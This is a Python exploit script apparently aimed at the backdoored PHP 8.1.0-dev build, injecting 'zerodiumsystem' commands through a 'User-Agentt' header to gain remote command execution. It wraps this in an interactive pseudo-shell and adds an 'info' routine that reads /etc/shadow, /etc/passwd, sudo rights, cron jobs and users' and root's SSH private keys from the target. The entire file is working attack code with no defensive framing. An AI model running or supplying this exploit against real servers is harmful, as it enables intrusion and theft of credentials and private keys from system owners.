#!/bin/env pyhton3

from requests import get as _get
from cmd import Cmd as _cmd
from os import system as _system
from threading import Thread as _thread
from time import sleep as _sleep

# colour
R = "\u001b[31;1m"
G = "\u001b[32;1m"
Y = "\u001b[33;1m"
N = "\u001b[0m"


PAYLOAD_KEY = "User-Agentt"
PAYLOAD_VALUE = 'zerodiumsystem("{}");'
TIMEOUT = 10

# exploit code

def check_and_exploit(url, command):
    res = _get(url, headers={PAYLOAD_KEY:PAYLOAD_VALUE.format(command)})
    if "PHP/8.1.0-dev" in [res.headers[x] for x in res.headers]:
        return res.text.split("<!DOCTYPE")[0]
    else:
        print("It May not vulnerable")
        raise SystemExit()
    return ""


# simple esc

def esc(url):
    for i,c in [
            ["cat /etc/passwd", Y],
            ["sudo -l", R],
            ["cat /home/*/.ssh/id_rsa", "/home/*/.ssh/id_rsa: "+Y],
            ["cat /root/.ssh/id_rsa", "/root/.ssh/id_rsa: "+R],
            ["cat /etc/os-release*", G],
            ["uname -a", Y],
            ["cat /etc/hosts", Y],
            ["cat /etc/shadow", R],
            ["cat /etc/cron.d/*|grep -v '#'", Y]
            ]:
        print(c+check_and_exploit(url,i) + N)

# Just shell

class Shell(_cmd):
    #prompt = "> "

    def url(self, url):
        self.url = url

    def emptyline(self):
        pass


    def onecmd(self, s):
        if s.strip() == 'exit':
            raise SystemExit()
        elif s.strip().startswith("!"):
            _system(s[1:])
        elif s.strip() == "clear":
            _system("clear")
        elif s.strip() == "info":
            print("Running in background process....")
            _thread(target=esc, args=[self.url]).start()

        else:
            print(check_and_exploit(self.url, s), end='')
        return



if __name__ == '__main__':
    url = input("Enter Url: ")
    print(G + check_and_exploit(url, "id"), N)
    print(" -----It's Not the real terminal-----\n(*) Type 'info' to get information\n")
    tmp = Shell()
    tmp.url = url
    tmp.prompt = "("+check_and_exploit(url, "whoami")[:-1]+") "
    tmp.cmdloop()